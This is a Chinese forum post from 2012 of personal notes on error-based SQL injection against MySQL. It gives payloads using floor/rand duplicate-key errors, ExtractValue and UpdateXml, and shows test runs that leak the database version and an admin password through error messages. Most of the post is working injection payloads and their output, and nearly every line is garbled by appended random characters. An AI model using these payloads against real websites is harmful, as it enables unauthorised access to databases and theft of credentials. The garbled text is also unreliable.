放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
& c/ ]' j$ C8 ]# g0 s/ v" [4 ?- V( `实际测试环境:
3 A7 J& r3 b$ G8 o; m# e2 {6 A+ }- j$ a/ I% R0 J, b
0 I/ h' G+ O3 emysql> show tables;2 C# D- i+ M/ ^ D0 G4 O
+----------------+, N2 n" m6 {: N- d& f6 K
| Tables_in_test |* |9 ~4 }& \. x% t
+----------------+* }* Y; I5 U5 v
| admin |% n) ?, [+ b: n9 Y8 Y
| article |
& f) k$ X4 t. P9 R( z, |& h+----------------+/ ^1 l1 e N/ {
, n% K' U8 M. U A2 p: ~2 h
K0 t4 }+ q& q, |; ]
# d; i0 o8 l0 G( Y) l# R$ X/ mmysql> describe admin;7 h3 ^( F* Z) C% A1 k
+-------+------------------+------+-----+---------+----------------+
8 t% u8 }2 }- }9 e| Field | Type | Null | Key | Default | Extra |
' [2 V# H8 {7 m7 s8 {+-------+------------------+------+-----+---------+----------------+6 a5 ^3 `$ Z0 Y/ Q1 U- w
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |$ v; ]- ~! A2 B/ [$ _
| user | varchar(50) | NO | | NULL | |3 k. \( M& h& x9 z8 L
| pass | varchar(50) | NO | | NULL | |+ `# p/ }& B1 ?2 I% _& `" L1 f
+-------+------------------+------+-----+---------+----------------+
: Z" w4 X0 f6 \7 p- `% \6 j" _
! w0 g" F9 G+ s
1 \; s! H5 a2 X; W1 P4 N0 s( d K
6 Y, ?- u. X" q8 {$ D' jmysql> describe article;
: `: z5 |/ u* V$ l9 X+---------+------------------+------+-----+---------+----------------+" F3 f& P0 N4 J1 C& g% H
| Field | Type | Null | Key | Default | Extra |* N5 q {. A3 T% ]; p+ X* _; ?9 M
+---------+------------------+------+-----+---------+----------------+
$ o( |+ ?/ p5 y/ }5 D| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
2 p, ?) ^0 v' k! [4 a| title | varchar(50) | NO | | NULL | |0 t4 T4 { q+ o) v
| content | varchar(50) | NO | | NULL | |
- _! n; |/ U' R5 P+---------+------------------+------+-----+---------+----------------+
3 a+ `* [0 \. x1、通过floor报错2 s* ^: c' s# A
可以通过如下一些利用代码. g/ ^ f4 T" T
. t. F% [6 u: w/ t: f( }0 |, h
! X/ N. H8 W) l$ q, p7 zand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
$ S; q) g- z' T, {from information_schema.tables group by x)a);9 [- _# v9 e/ d8 C' S& s
0 h, h; s3 ?1 x4 J
1 u0 f2 _- j0 S* K+ W0 Xand (select count(*) from (select 1 union select null union select !1)x$ I! [ G: f. N3 V
group by concat((select table_name from information_schema.tables limit 1),1 H$ n, A( G. m0 E* j9 d) W; F
floor(rand(0)*2)));3 y! G; d- q7 l/ |4 e# q4 w5 O
举例如下:% |2 }: N Y" ?( h* G! }
首先进行正常查询: o2 k1 l x/ [
9 c" H4 E% K/ t( P% c" C
mysql> select * from article where id = 1;( F9 T! v$ G4 z
+----+-------+---------+
* k; X; [6 ~& w7 m- X" n; h| id | title | content |
& q! W# b4 E+ T6 b9 o$ W+----+-------+---------+
/ N7 n' W0 s9 z| 1 | test | do it |
' m8 V* c% G+ R- m- V+----+-------+---------+; x+ \0 X' _9 N+ K% t
假如id输入存在注入的话,可以通过如下语句进行报错。) o7 |0 I5 k; C2 R- w+ N
" d: T6 T) G! ~8 s: m; r 2 t9 E( E, k I! `1 ~4 P
mysql> select * from article where id = 1 and (select 1 from
' Y- F: K$ P4 h8 d; m' h' H$ f(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
( k' u7 J. ~* w7 S; CERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'- w6 U& ~+ [1 L5 P
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
' c5 e2 \( ~7 N( p例如我们需要查询管理员用户名和密码:
A ^. D- J9 F- mMethod1:
6 ]9 d" a# n' J8 o$ m
- m" ?& O' K2 i7 H) {. f4 Y' Z) e - ~4 O% J$ l8 A; S- C& g( z
mysql> select * from article where id = 1 and (select 1 from
+ C. t7 ^! d7 e7 u/ i(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x. \1 n9 J: O& T0 {, G P
from information_schema.tables group by x)a);
) I$ r! D& p7 k) _: ~ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'+ g, d. `. R; H$ g7 [7 D
Method2:
; E( w- I$ j7 d1 s, i. f# l+ `
6 N; w& K3 L. y5 @2 Y: s/ R$ p # h3 m8 P; [- d- L
mysql> select * from article where id = 1 and (select count(*). b% Q% Q* \3 t6 w! q
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),. F! P- I( X! @ D
floor(rand(0)*2)));" J( m* X( Q R H' ~
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'1 a8 y) `' Q# q
2、ExtractValue) i0 |9 Y: `3 N+ j% h
测试语句如下
R3 K* E5 T2 X) k. H3 B * B% Y/ w4 x5 \* m
, b! |# |5 r5 p' X+ |. pand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
. N( ]5 k# \3 W/ ^7 K- n4 ^实际测试过程
/ }- d8 v+ Z# c0 X% o% N3 z4 f
3 v" }9 M; N) Z' O
1 Z, C8 S( S. H* _; {mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
* G- Z* f1 p7 k. C8 h* u$ q) ?(select pass from admin limit 1)));--
8 \! ^; {) P/ a( AERROR 1105 (HY000): XPATH syntax error: '\admin888'
: { X2 h! N3 G0 N2 j, R3、UpdateXml
+ a! `) w/ k7 X L% D/ Z# m测试语句% d$ j: [* p; K6 s/ \5 j- U
* v8 V* b2 X! N: R3 ?
4 Z7 P' ^6 ?7 |; T8 f
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1)), Q% x& I5 b/ L! R, E; I
实际测试过程
4 Q- c N" R% l' z% e5 K$ q' V 8 \3 M' z8 T# H. M( R
# Y. v5 h) c; H& d
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,, {) l0 c! ?4 T. N+ ~/ c
(select pass from admin limit 1),0x5e24),1));* O, s0 `" g' z/ x- S
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'2 e% \" e* z7 G1 Q4 n4 ?: e
All, thanks foreign guys.
. c0 u5 f7 Q3 m0 A. S # R( ^: T( f% {
" z# p8 W1 g( h& G: U- B9 c! l. a |
发表于 2012-12-10 10:28:51
收藏
支持
反对